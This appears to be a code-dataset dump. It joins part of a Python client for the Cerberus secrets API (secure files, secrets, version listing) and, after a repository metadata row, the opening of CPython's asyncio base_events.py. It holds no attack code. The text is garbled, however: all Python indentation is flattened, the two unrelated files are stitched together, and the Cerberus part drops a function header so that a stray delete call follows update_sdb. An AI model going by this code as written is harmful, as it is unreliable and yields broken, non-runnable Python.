sdb_raw = self.get_sdbs()
sdbs = []
for s in sdb_raw:
sdbs.append(s['name'])
return sdbs
def update_sdb(self, sdb_id, owner=None, description=None, user_group_permissions=None,
iam_principal_permissions=None):
old_data = self.get_sdb_by_id(sdb_id)
temp_data = {}
keys = ('owner', 'description', 'iam_principal_permissions', 'user_group_permissions')
for k in keys:
if k in old_data:
temp_data[k] = old_data[k]
if owner is not None:
temp_data["owner"] = owner
if description is not None:
temp_data["description"] = description
if user_group_permissions is not None and len(user_group_permissions) > 0:
temp_data["user_group_permissions"] = user_group_permissions
if iam_principal_permissions is not None and len(iam_principal_permissions) > 0:
temp_data["iam_principal_permissions"] = iam_principal_permissions
data = json.encoder.JSONEncoder().encode(temp_data)
sdb_resp = put_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id, data=str(data),
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
secret_resp = delete_with_retry(self.cerberus_url + '/v1/secure-file/' + secure_data_path,
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def get_file_metadata(self, secure_data_path, version=None):
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = head_with_retry(str.join('', [self.cerberus_url, '/v1/secure-file/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.headers
def _get_file(self, secure_data_path, version=None):
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secure-file/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def _parse_metadata_filename(self, metadata):
index = metadata['Content-Disposition'].index('=')+1
metadata['filename'] = metadata['Content-Disposition'][index:].replace('"', '')
return metadata
def get_file(self, secure_data_path, version=None):
query = self._get_file(secure_data_path, version)
resp = query.headers.copy()
resp = self._parse_metadata_filename(resp)
resp['data'] = query.content
return resp
def get_file_data(self, secure_data_path, version=None):
return self._get_file(secure_data_path, version).content
def get_file_versions(self, secure_data_path, limit=None, offset=None):
return self.get_secret_versions(secure_data_path, limit, offset)
def _get_all_file_version_ids(self, secure_data_path, limit=None):
offset = 0
# Prime the versions dictionary so that all the logic can happen in the loop
versions = {'has_next': True, 'next_offset': 0}
while (versions['has_next']):
offset = versions['next_offset']
versions = self.get_file_versions(secure_data_path, limit, offset)
for summary in versions['secure_data_version_summaries']:
yield summary
def _get_all_file_versions(self, secure_data_path, limit=None):
for secret in self._get_all_file_version_ids(secure_data_path, limit):
yield {'secret': self.get_file_data(secure_data_path, version=secret['id']),
'version': secret}
def list_files(self, secure_data_path, limit=None, offset=None):
# Make sure that limit and offset are in range.
# Set the normal defaults
if not limit or limit <= 0:
limit = 100
if not offset or offset < 0:
offset = 0
payload = {'limit': str(limit), 'offset': str(offset)}
# Because of the addition of versionId and the way URLs are constructed, secure_data_path should
# always end in a '/'.
secure_data_path = self._add_slash(secure_data_path)
secret_resp = get_with_retry(self.cerberus_url + '/v1/secure-files/' + secure_data_path,
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def put_file(self, secure_data_path, filehandle, content_type=None):
# Parse out the filename from the path
filename = secure_data_path.rsplit('/', 1)
if content_type:
data = {'file-content': (filename, filehandle, content_type)}
else:
data = {'file-content': (filename, filehandle)}
headers = self.HEADERS.copy()
if 'Content-Type' in headers:
headers.__delitem__('Content-Type')
secret_resp = post_with_retry(self.cerberus_url + '/v1/secure-file/' + secure_data_path,
files=data, headers=headers)
throw_if_bad_response(secret_resp)
return secret_resp
###------ Secrets -----####
def delete_secret(self, secure_data_path):
secret_resp = delete_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path,
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def get_secret(self, secure_data_path, key, version=None):
warnings.warn(
"get_secret is deprecated, use get_secrets_data instead",
DeprecationWarning
)
secret_resp_json = self._get_secrets(secure_data_path, version)
if key in secret_resp_json['data']:
return secret_resp_json['data'][key]
else:
raise CerberusClientException("Key '%s' not found" % key)
def _get_secrets(self, secure_data_path, version=None):
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secret/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def get_secrets(self, secure_data_path, version=None):
warnings.warn(
"get_secrets is deprecated, use get_secrets_data instead",
DeprecationWarning
)
return self._get_secrets(secure_data_path, version)
def get_secrets_data(self, secure_data_path, version=None):
return self._get_secrets(secure_data_path, version)['data']
def get_secret_versions(self, secure_data_path, limit=None, offset=None):
# Make sure that limit and offset are in range.
# Set the normal defaults
if not limit or limit <= 0:
limit = 100
if not offset or offset < 0:
offset = 0
payload = {'limit': str(limit), 'offset': str(offset)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secret-versions/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def _get_all_secret_version_ids(self, secure_data_path, limit=None):
offset = 0
# Prime the versions dictionary so that all the logic can happen in the loop
versions = {'has_next': True, 'next_offset': 0}
while (versions['has_next']):
offset = versions['next_offset']
versions = self.get_secret_versions(secure_data_path, limit, offset)
for summary in versions['secure_data_version_summaries']:
yield summary
def _get_all_secret_versions(self, secure_data_path, limit=None):
for secret in self._get_all_secret_version_ids(secure_data_path, limit):
yield {'secret': self.get_secrets_data(secure_data_path, version=secret['id']),
'version': secret}
def list_secrets(self, secure_data_path):
# Because of the addition of versionId and the way URLs are constructed, secure_data_path should
# always end in a '/'.
secure_data_path = self._add_slash(secure_data_path)
secret_resp = get_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path + '?list=true',
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def put_secret(self, secure_data_path, secret, merge=True):
# json encode the input. Cerberus is sensitive to double vs single quotes.
# an added bonus is that json encoding transforms python2 unicode strings
# into a compatible format.
data = json.encoder.JSONEncoder().encode(secret)
if merge:
data = self.secret_merge(secure_data_path, secret)
secret_resp = post_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path,
data=str(data), headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def secret_merge(self, secure_data_path, key):
get_resp = get_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path, headers=self.HEADERS)
temp_key = {}
# Ignore a return of 404 since it means the key might not exist
if get_resp.status_code == requests.codes.bad and get_resp.status_code not in [403, 404]:
throw_if_bad_response(get_resp)
elif get_resp.status_code in [403, 404]:
temp_key = {}
else:
temp_key = get_resp.json()['data']
# Allow key to be either a string describing a dict or a dict.
if type(key) == str:
temp_key.update(ast.literal_eval(key))
else:
temp_key.update(key)
# This is a bit of a hack to get around python 2 treating unicode strings
# differently. Cerberus will throw a 400 if we try to post python 2 style
# unicode stings as the payload.
combined_key = json.encoder.JSONEncoder().encode(temp_key)
return combined_key
| true | true |
f7233563446d2d7e1ced2469a7d923c062a2ff32 | 69,830 | py | Python | Python-3.7.12/Lib/asyncio/base_events.py | TimS-ml/CPython-internals-Note | 8dcf9e9db3a42926689ed426ec271bcae7db8178 | [
"Xnet",
"X11"
] | 1,738 | 2017-09-21T10:59:12.000Z | 2022-03-31T21:05:46.000Z | Python-3.7.12/Lib/asyncio/base_events.py | TimS-ml/CPython-internals-Note | 8dcf9e9db3a42926689ed426ec271bcae7db8178 | [
"Xnet",
"X11"
] | 427 | 2017-09-29T22:54:36.000Z | 2022-02-15T19:26:50.000Z | Python-3.7.12/Lib/asyncio/base_events.py | TimS-ml/CPython-internals-Note | 8dcf9e9db3a42926689ed426ec271bcae7db8178 | [
"Xnet",
"X11"
] | 671 | 2017-09-21T08:04:01.000Z | 2022-03-29T14:30:07.000Z | """Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import heapq
import itertools
import logging
import os
import socket
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import futures
from . import protocols
from . import sslproto
from . import tasks
from . import transports
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# Used for deprecation and removal of `loop.create_datagram_endpoint()`'s
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, BaseException) and not isinstance(exc, Exception):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return []
return list(self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0, loop=self._loop)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except futures.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True,
loop=self)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
def _check_runnung(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_runnung()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_runnung()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self):
if not self.is_closed():
warnings.warn(f"unclosed event loop {self!r}", ResourceWarning,
source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor()
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except events.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise events.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None):
"""Connect to a TCP server.
Create a streaming transport connection to a given Internet host and
port: socket family AF_INET or socket.AF_INET6 depending on host (or
family if specified), socket type SOCK_STREAM. protocol_factory must be
a callable returning a protocol instance.
This method is a coroutine which will try to establish the connection
in the background. When successful, the coroutine returns a
(transport, protocol) pair.
"""
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
# Use host as default for server_hostname. It is an error
# if host is empty or not set, e.g. when an
# already-connected socket was passed or when only a port
# is given. To avoid this error, you can pass
# server_hostname='' -- this will bypass the hostname
# check. (This also means that if host is a numeric
# IP/IPv6 address, we will attempt to verify that exact
# address; this will probably fail, but it is possible to
# create a certificate for a specific IP address, so we
# don't judge it here.)
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
exceptions = []
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
if local_addr is not None:
for _, _, _, _, laddr in laddr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
exceptions.append(exc)
else:
sock.close()
sock = None
continue
if self._debug:
logger.debug("connect %r to %r", sock, address)
await self.sock_connect(sock, address)
except OSError as exc:
if sock is not None:
sock.close()
exceptions.append(exc)
except:
if sock is not None:
sock.close()
raise
else:
break
else:
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
'host and port was not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
